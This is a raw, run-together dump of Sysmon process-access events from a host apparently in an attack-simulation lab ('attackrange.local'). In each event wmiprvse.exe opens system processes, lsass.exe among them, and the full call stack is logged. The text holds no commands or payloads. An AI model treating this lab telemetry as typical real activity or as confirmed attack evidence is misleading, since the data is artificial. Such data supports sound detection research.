15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026398Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026397Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026396Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026395Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026394Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5367-6008-6706-00000000A301}2832C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026393Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026392Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026391Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026390Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026389Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026388Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026387Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026386Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026385Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026384Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026383Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026382Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026381Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026380Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:36.866{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026379Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 